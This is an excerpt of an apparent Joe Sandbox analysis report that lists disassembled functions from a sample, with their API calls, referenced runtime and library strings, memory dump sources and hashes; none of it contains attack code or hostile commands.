(((rwlock_t *)*rwl)->valid == LIFE_RWLOCK) && (((rwlock_t *)*rwl)->busy > 0), xrefs: 00007FF650237783

Memory Dump Source

Source File: 00000002.00000002.1973204457.00007FF650221000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF650220000, based on PE: true

Associated: 00000002.00000002.1973182140.00007FF650220000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973238448.00007FF650253000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973262418.00007FF650255000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973448814.00007FF65046F000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973489612.00007FF650471000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973489612.00007FF650477000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973580952.00007FF65047F000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973617853.00007FF650481000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973617853.00007FF650484000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973811912.00007FF650485000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff650220000_GR55Qg1hth.jbxd

Similarity

API ID:
String ID: (((rwlock_t *)*rwl)->valid == LIFE_RWLOCK) && (((rwlock_t *)*rwl)->busy > 0)$.$Assertion failed: (%s), file %s, line %d$C:/crossdev/src/mingw-w64-v8-git/mingw-w64-libraries/winpthreads/src/rwlock.c
API String ID: 0-3957588491
Opcode ID: 90e9a235c3baf15315dd5754873b62cb7da9049c760fac29f939e69ca475d171
Instruction ID: 604b2da80431b8758dd28cc11575a5da477c7b2ac47a61b16523394d04490b63
Opcode Fuzzy Hash: 90e9a235c3baf15315dd5754873b62cb7da9049c760fac29f939e69ca475d171
Instruction Fuzzy Hash: 6A315532A09B4BE5EE20AB19D2153F86BA4FB48B44F8C8136DA4CA7391DF3CE445C701

Function 00007FF650239CF0 Relevance: 10.5, APIs: 7, Instructions: 46COMMON

Download Yara Rule

APIs

GetCurrentProcessId.KERNEL32 ref: 00007FF650239D20
OpenProcess.KERNEL32 ref: 00007FF650239D37
CloseHandle.KERNEL32 ref: 00007FF650239D45
_errno.MSVCRT ref: 00007FF650239D61

Memory Dump Source

Source File: 00000002.00000002.1973204457.00007FF650221000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF650220000, based on PE: true

Associated: 00000002.00000002.1973182140.00007FF650220000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973238448.00007FF650253000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973262418.00007FF650255000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973448814.00007FF65046F000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973489612.00007FF650471000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973489612.00007FF650477000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973580952.00007FF65047F000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973617853.00007FF650481000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973617853.00007FF650484000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973811912.00007FF650485000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff650220000_GR55Qg1hth.jbxd

Similarity

API ID: Process$CloseCurrentHandleOpen_errno
String ID:
API String ID: 2250453136-0
Opcode ID: 804481c94524e79c3e56c53991d464a34c0d8cffbd2439700dc1c269fe1b29ae
Instruction ID: 2b50de7b3f39fa9f3fd1c35fdeb8dac820e2cc77096d72a124c1b052a8f7bbcf
Opcode Fuzzy Hash: 804481c94524e79c3e56c53991d464a34c0d8cffbd2439700dc1c269fe1b29ae
Instruction Fuzzy Hash: EE01F53292CA0BE7FBD56F61994117826A0BF4AB24F4C1A30CE2EA53D0DE3CB484C710

Function 00007FF650238740 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 45threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 00007FF650238760
fprintf.MSVCRT ref: 00007FF65023877F
GetCurrentThreadId.KERNEL32 ref: 00007FF650238795
fprintf.MSVCRT ref: 00007FF6502387BC

Strings

C%p %d V=%0X w=%ld %s, xrefs: 00007FF6502387A3
C%p %d %s, xrefs: 00007FF65023876E

Memory Dump Source

Source File: 00000002.00000002.1973204457.00007FF650221000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF650220000, based on PE: true

Associated: 00000002.00000002.1973182140.00007FF650220000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973238448.00007FF650253000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973262418.00007FF650255000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973448814.00007FF65046F000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973489612.00007FF650471000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973489612.00007FF650477000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973580952.00007FF65047F000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973617853.00007FF650481000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973617853.00007FF650484000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973811912.00007FF650485000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff650220000_GR55Qg1hth.jbxd

Similarity

API ID: CurrentThreadfprintf
String ID: C%p %d %s$C%p %d V=%0X w=%ld %s
API String ID: 1384477639-884133013
Opcode ID: 66961c87c69832063d6ef2cf05f65d98d545adb8271c9f1236b0f703b14b2a8c
Instruction ID: b2769cedc583ec8061c3101b377bb7dfe0259d3796eb762f5f0cd41a35739d42
Opcode Fuzzy Hash: 66961c87c69832063d6ef2cf05f65d98d545adb8271c9f1236b0f703b14b2a8c
Instruction Fuzzy Hash: 2E016D76A19747E6EA119F25E8014A87BA4BB88BD8F5C8135DE4CE3750EF3CE4428710

Function 00007FF65022CBB0 Relevance: 9.2, APIs: 1, Strings: 5, Instructions: 230COMMON

Download Yara Rule

Strings

default arg#, xrefs: 00007FF65022CDAB
{, xrefs: 00007FF65022CDB2
:, xrefs: 00007FF65022CCC6
}::, xrefs: 00007FF65022CEA9
}, xrefs: 00007FF65022CEB0

Memory Dump Source

Source File: 00000002.00000002.1973204457.00007FF650221000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF650220000, based on PE: true

Associated: 00000002.00000002.1973182140.00007FF650220000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973238448.00007FF650253000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973262418.00007FF650255000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973448814.00007FF65046F000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973489612.00007FF650471000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973489612.00007FF650477000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973580952.00007FF65047F000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973617853.00007FF650481000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973617853.00007FF650484000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973811912.00007FF650485000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff650220000_GR55Qg1hth.jbxd

Similarity

API ID:
String ID: :$default arg#${$}$}::
API String ID: 0-1396675520
Opcode ID: dbdfe7a09765517834bd71df3c1fd393ccdfb57157c89f17ae7f9f660f19c1fa
Instruction ID: 1ee0d1e26f74dcf4a9d337014270eff4969ec377442fb569f27191139e65ff84
Opcode Fuzzy Hash: dbdfe7a09765517834bd71df3c1fd393ccdfb57157c89f17ae7f9f660f19c1fa
Instruction Fuzzy Hash: 3791F572A0868397E7698B65A9003FA6B91FB45B98F6C4032CF9E57785DF7CE481D300

Function 00007FF65022F480 Relevance: 9.0, APIs: 6, Instructions: 35windowCOMMON

Download Yara Rule

APIs

GetLastError.KERNEL32 ref: 00007FF65022F48A
FormatMessageA.KERNEL32 ref: 00007FF65022F4CB
IsDebuggerPresent.KERNEL32 ref: 00007FF65022F4D5

Memory Dump Source

Source File: 00000002.00000002.1973204457.00007FF650221000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF650220000, based on PE: true

Associated: 00000002.00000002.1973182140.00007FF650220000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973238448.00007FF650253000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973262418.00007FF650255000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973448814.00007FF65046F000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973489612.00007FF650471000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973489612.00007FF650477000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973580952.00007FF65047F000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973617853.00007FF650481000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973617853.00007FF650484000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973811912.00007FF650485000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff650220000_GR55Qg1hth.jbxd

Similarity

API ID: DebuggerErrorFormatLastMessagePresent
String ID:
API String ID: 2392558662-0
Opcode ID: 9ab93466ed8d4e6054295730cbe503c77c3230275627338014f15eee742c3481
Instruction ID: 68ca0cdb7fc18d9b2898010ee6a9a9b22b02a76e221ec3790c4513ebe2f2e123
Opcode Fuzzy Hash: 9ab93466ed8d4e6054295730cbe503c77c3230275627338014f15eee742c3481
Instruction Fuzzy Hash: 01014B31A2CA03A1E6E09B26FC4573A2660BF88B84F4C0438DE4DE2764EE7CD040CB50

Function 00007FF650238BD0 Relevance: 7.7, APIs: 5, Instructions: 186synchronizationCOMMON

Download Yara Rule

APIs

Part of subcall function 00007FF650237320: WaitForMultipleObjects.KERNEL32 ref: 00007FF650237394

ResetEvent.KERNEL32 ref: 00007FF650238C37
WaitForSingleObject.KERNEL32 ref: 00007FF650238CB0

Memory Dump Source

Source File: 00000002.00000002.1973204457.00007FF650221000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF650220000, based on PE: true

Associated: 00000002.00000002.1973182140.00007FF650220000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973238448.00007FF650253000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973262418.00007FF650255000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973448814.00007FF65046F000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973489612.00007FF650471000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973489612.00007FF650477000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973580952.00007FF65047F000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973617853.00007FF650481000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973617853.00007FF650484000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973811912.00007FF650485000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff650220000_GR55Qg1hth.jbxd

Similarity

API ID: Wait$EventMultipleObjectObjectsResetSingle
String ID:
API String ID: 256776027-0
Opcode ID: 333640768f44088b6358db1d802b48c51ed78d25bcb5857e51e649b75cf48d90
Instruction ID: c9c0baec14368629f759e4bc73bd1a1e775f225b0f274b21c5353f25abb41c1c
Opcode Fuzzy Hash: 333640768f44088b6358db1d802b48c51ed78d25bcb5857e51e649b75cf48d90
Instruction Fuzzy Hash: 58517331E0D70361FAB9562697013FA08957F9C795F5C1436EE0EEABD1EE6CE881C211

Function 00007FF65024EA20 Relevance: 7.7, APIs: 4, Strings: 1, Instructions: 167COMMON

Download Yara Rule

APIs

wcslen.MSVCRT ref: 00007FF65024EA32
memcpy.MSVCRT ref: 00007FF65024EA84
memcpy.MSVCRT ref: 00007FF65024EB40

Strings

basic_string::append, xrefs: 00007FF65024EADA, 00007FF65024EB98

Memory Dump Source

Source File: 00000002.00000002.1973204457.00007FF650221000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF650220000, based on PE: true

Associated: 00000002.00000002.1973182140.00007FF650220000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973238448.00007FF650253000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973262418.00007FF650255000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973448814.00007FF65046F000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973489612.00007FF650471000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973489612.00007FF650477000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973580952.00007FF65047F000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973617853.00007FF650481000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973617853.00007FF650484000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973811912.00007FF650485000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff650220000_GR55Qg1hth.jbxd

Similarity

API ID: memcpy$wcslen
String ID: basic_string::append
API String ID: 1844840824-3811946249
Opcode ID: 4f35981e2956fcbfb4fc5bfff5f13df9ac9569ef0579284781b94cf1080cf309
Instruction ID: 95160e2bb63f3729f7c06620fe53d14f7fec057b3de64964a652d28efdf3406f
Opcode Fuzzy Hash: 4f35981e2956fcbfb4fc5bfff5f13df9ac9569ef0579284781b94cf1080cf309
Instruction Fuzzy Hash: 22516972A08A57B0EF10DF16D5488BD2761FB55BD4B9C8532DEAEA73E1EE28E541C300

Function 00007FF650250500 Relevance: 7.6, APIs: 1, Strings: 4, Instructions: 147COMMON

Download Yara Rule

Strings

basic_string::basic_string, xrefs: 00007FF6502505F1, 00007FF650250648
string::string, xrefs: 00007FF650250698
%s: __pos (which is %zu) > this->size() (which is %zu), xrefs: 00007FF6502505F8, 00007FF65025064F, 00007FF65025069F
basic_string::_M_create, xrefs: 00007FF6502505A7

Memory Dump Source

Source File: 00000002.00000002.1973204457.00007FF650221000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF650220000, based on PE: true

Associated: 00000002.00000002.1973182140.00007FF650220000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973238448.00007FF650253000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973262418.00007FF650255000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973448814.00007FF65046F000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973489612.00007FF650471000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973489612.00007FF650477000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973580952.00007FF65047F000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973617853.00007FF650481000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973617853.00007FF650484000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973811912.00007FF650485000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff650220000_GR55Qg1hth.jbxd

Similarity

API ID:
String ID: %s: __pos (which is %zu) > this->size() (which is %zu)$basic_string::_M_create$basic_string::basic_string$string::string
API String ID: 0-126128797
Opcode ID: a7d147249b8188fe6aada238a8c67af0756d0aac0570078bca750538eec17cd2
Instruction ID: 9e6ffa5ec76a7f7b027271ebd5aa39ebf9ec3474a2780f33bfbc249aca6a352e
Opcode Fuzzy Hash: a7d147249b8188fe6aada238a8c67af0756d0aac0570078bca750538eec17cd2
Instruction Fuzzy Hash: DC41D476B05B47E0EB109F29D9408AC2760FB14F94B9C5632CA1DAB3A8FF6CD596C304

Function 00007FF650230400 Relevance: 7.6, APIs: 5, Instructions: 122COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1973204457.00007FF650221000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF650220000, based on PE: true

Associated: 00000002.00000002.1973182140.00007FF650220000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973238448.00007FF650253000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973262418.00007FF650255000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973448814.00007FF65046F000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973489612.00007FF650471000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973489612.00007FF650477000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973580952.00007FF65047F000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973617853.00007FF650481000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973617853.00007FF650484000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973811912.00007FF650485000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff650220000_GR55Qg1hth.jbxd

Similarity

API ID: Time$FileSystem
String ID:
API String ID: 2086374402-0
Opcode ID: 7ea3cd9a7fec929e8e7181801140b1aa040794d3e43b1313136038803cab3235
Instruction ID: 715903738ffe32febbe2e7c5db00092eec86bc6c6bc0e3a116c4334f993a5855
Opcode Fuzzy Hash: 7ea3cd9a7fec929e8e7181801140b1aa040794d3e43b1313136038803cab3235
Instruction Fuzzy Hash: 4641E732B1425366FFA19A15A6986BB1594FF48794F4C4035DF1CD23C0EE3CE980C362

Function 00007FF6502302A0 Relevance: 7.6, APIs: 5, Instructions: 102threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 00007FF6502302E0

Memory Dump Source

Source File: 00000002.00000002.1973204457.00007FF650221000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF650220000, based on PE: true

Associated: 00000002.00000002.1973182140.00007FF650220000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973238448.00007FF650253000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973262418.00007FF650255000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973448814.00007FF65046F000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973489612.00007FF650471000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973489612.00007FF650477000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973580952.00007FF65047F000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973617853.00007FF650481000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973617853.00007FF650484000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973811912.00007FF650485000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff650220000_GR55Qg1hth.jbxd

Similarity

API ID: CurrentThread
String ID:
API String ID: 2882836952-0
Opcode ID: c3dbcde8f0b4fa2481ac558daa9862e56226f964894df8beb5549e6713ef9bca
Instruction ID: 8ff32b5b9ed36353f652b48803e3a26385eacd64d9ff59ed225150fed296bab2
Opcode Fuzzy Hash: c3dbcde8f0b4fa2481ac558daa9862e56226f964894df8beb5549e6713ef9bca
Instruction Fuzzy Hash: 5731D432B0921397FF669B15AA987AB2594EF48390F084475DE0CD6780EE38DC81C361

Function 00007FF650238640 Relevance: 7.6, APIs: 5, Instructions: 57COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32 ref: 00007FF650238658
ReleaseSemaphore.KERNEL32 ref: 00007FF650238686
LeaveCriticalSection.KERNEL32 ref: 00007FF650238693
LeaveCriticalSection.KERNEL32 ref: 00007FF6502386B3
LeaveCriticalSection.KERNEL32 ref: 00007FF6502386D8

Memory Dump Source

Source File: 00000002.00000002.1973204457.00007FF650221000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF650220000, based on PE: true

Associated: 00000002.00000002.1973182140.00007FF650220000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973238448.00007FF650253000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973262418.00007FF650255000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973448814.00007FF65046F000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973489612.00007FF650471000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973489612.00007FF650477000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973580952.00007FF65047F000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973617853.00007FF650481000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973617853.00007FF650484000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973811912.00007FF650485000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff650220000_GR55Qg1hth.jbxd

Similarity

API ID: CriticalSection$Leave$EnterReleaseSemaphore
String ID:
API String ID: 2813224205-0
Opcode ID: 87c8e58c18ea95cf91d094f47a20d37f7ca4a1ecea6f371982ba1520a479a2f9
Instruction ID: 2af83cb4ddb40d5fafb8705772a67fa45bd47a3ef3c6a47c18761f402eab4cde
Opcode Fuzzy Hash: 87c8e58c18ea95cf91d094f47a20d37f7ca4a1ecea6f371982ba1520a479a2f9
Instruction Fuzzy Hash: 51014523F15607A2E7858F277C812759254BF98B72F884936CE0D86380DD3CD8C28700

Function 000001B630F73504 Relevance: 7.6, APIs: 5, Instructions: 56COMMONLIBRARYCODE

Download Yara Rule

APIs

_set_statfp.LIBCMT ref: 000001B630F7352C
_set_statfp.LIBCMT ref: 000001B630F73547
_set_statfp.LIBCMT ref: 000001B630F73563
_set_statfp.LIBCMT ref: 000001B630F7359F

Memory Dump Source

Source File: 00000002.00000002.1972631076.000001B630F60000.00000040.00000400.00020000.00000000.sdmp, Offset: 000001B630F60000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1b630f60000_GR55Qg1hth.jbxd

Similarity

API ID: _set_statfp
String ID:
API String ID: 1156100317-0
Opcode ID: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
Instruction ID: 8169614b691d3850c5d9c0ef4f2340dbed68275c4bac6d5131f657ee4ddeeca6
Opcode Fuzzy Hash: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
Instruction Fuzzy Hash: D011A333A10A1331FA641528E441BE931C17B7CBF4F4C862CED6E162F6CB2EC84D420A

Function 00007FF65022EF20 Relevance: 7.5, APIs: 3, Strings: 2, Instructions: 45COMMON

Download Yara Rule

APIs

calloc.MSVCRT ref: 00007FF65022EF6F
EnterCriticalSection.KERNEL32 ref: 00007FF65022EF8A
LeaveCriticalSection.KERNEL32 ref: 00007FF65022EFA9

Strings

C:/crossdev/src/mingw-w64-v8-git/mingw-w64-crt/crt/tls_atexit.c, xrefs: 00007FF65022EF52
!dso || dso == &__dso_handle, xrefs: 00007FF65022EF59

Memory Dump Source

Source File: 00000002.00000002.1973204457.00007FF650221000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF650220000, based on PE: true

Associated: 00000002.00000002.1973182140.00007FF650220000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973238448.00007FF650253000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973262418.00007FF650255000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973448814.00007FF65046F000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973489612.00007FF650471000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973489612.00007FF650477000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973580952.00007FF65047F000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973617853.00007FF650481000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973617853.00007FF650484000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973811912.00007FF650485000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff650220000_GR55Qg1hth.jbxd

Similarity

API ID: CriticalSection$EnterLeavecalloc
String ID: !dso || dso == &__dso_handle$C:/crossdev/src/mingw-w64-v8-git/mingw-w64-crt/crt/tls_atexit.c
API String ID: 876395260-4180103562
Opcode ID: 6b1b94e2b854d058ceb5e352e6701c080ee4a6c78f0fd052f1b8341398326f66
Instruction ID: 8831502b3096334eeae26042fae90bb705781c85bfe8786846dbbaf4ec535b95
Opcode Fuzzy Hash: 6b1b94e2b854d058ceb5e352e6701c080ee4a6c78f0fd052f1b8341398326f66
Instruction Fuzzy Hash: 03011771A19603F5FB619B55FA411B527A0AF48B90FCC4534D91CE7B94EE2CE987C340

Function 00007FF650239C80 Relevance: 7.5, APIs: 5, Instructions: 31COMMON

Download Yara Rule

APIs

GetCurrentProcessId.KERNEL32 ref: 00007FF650239C98
OpenProcess.KERNEL32 ref: 00007FF650239CAF
CloseHandle.KERNEL32 ref: 00007FF650239CBD

Memory Dump Source

Source File: 00000002.00000002.1973204457.00007FF650221000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF650220000, based on PE: true

Associated: 00000002.00000002.1973182140.00007FF650220000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973238448.00007FF650253000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973262418.00007FF650255000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973448814.00007FF65046F000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973489612.00007FF650471000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973489612.00007FF650477000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973580952.00007FF65047F000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973617853.00007FF650481000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973617853.00007FF650484000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973811912.00007FF650485000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff650220000_GR55Qg1hth.jbxd

Similarity

API ID: Process$CloseCurrentHandleOpen
String ID:
API String ID: 2750122171-0
Opcode ID: 6b3bebf15781c7906bfe3100282d93060f2eddcdd3cbff8ec681021e1514230b
Instruction ID: ebe9a454731a03732c52b503c62d5b73b429e76d79a694174e7db786ddaca48c
Opcode Fuzzy Hash: 6b3bebf15781c7906bfe3100282d93060f2eddcdd3cbff8ec681021e1514230b
Instruction Fuzzy Hash: 5BF05E31A2DA03E7FBA89F71949017916E0AF4DB15F4C1D34CA1EE53E0DE2CE4898790

Function 000001B630F6F040 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 182COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 000001B630F6F124

Strings

Tuesday, xrefs: 000001B630F6F0F4
or copy constructor iterator', xrefs: 000001B630F6F25A, 000001B630F6F275
Wednesday, xrefs: 000001B630F6F1ED

Memory Dump Source

